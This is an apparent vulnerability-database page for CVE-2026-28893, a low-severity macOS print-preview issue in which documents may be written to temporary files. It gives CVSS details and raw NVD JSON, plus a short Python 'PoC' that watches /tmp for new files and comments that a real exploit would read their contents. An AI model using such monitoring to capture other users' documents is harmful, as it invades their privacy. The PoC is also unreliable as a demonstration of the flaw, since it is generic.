Security Vulnerability Report
中文
CVE-2026-28893 CVSS 3.3 LOW

CVE-2026-28893

Published: 2026-03-25 01:17:13
Last Modified: 2026-03-27 20:16:28
Source: [email protected]

Description

A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Tahoe 26.4. A document may be written to a temporary file when using print preview.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
macOS Tahoe < 26.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-28893: Monitoring temp files during print preview import os import time TEMP_DIRS = ['/tmp', '/var/folders'] def monitor_temp_files(): print("[*] Monitoring temporary directories for print preview artifacts...") existing_files = set() for root, dirs, files in os.walk('/tmp'): # Simplified for demo for file in files: existing_files.add(os.path.join(root, file)) try: while True: for root, dirs, files in os.walk('/tmp'): for file in files: file_path = os.path.join(root, file) if file_path not in existing_files: print(f"[+] New file detected: {file_path}") # In a real exploit, read content here existing_files.add(file_path) time.sleep(1) except KeyboardInterrupt: print("\n[*] Stopping monitor.") if __name__ == "__main__": monitor_temp_files()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28893", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:12.777", "lastModified": "2026-03-27T20:16:27.633", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Tahoe 26.4. A document may be written to a temporary file when using print preview."}, {"lang": "es", "value": "Se abordó un problema de privacidad con un manejo mejorado de los archivos temporales. Este problema está solucionado en macOS Tahoe 26.4. Un documento puede escribirse en un archivo temporal al usar la vista previa de impresión."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.4", "matchCriteriaId": "6CF848CD-25D4-4371-BEF3-1ACCE47AD81F"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.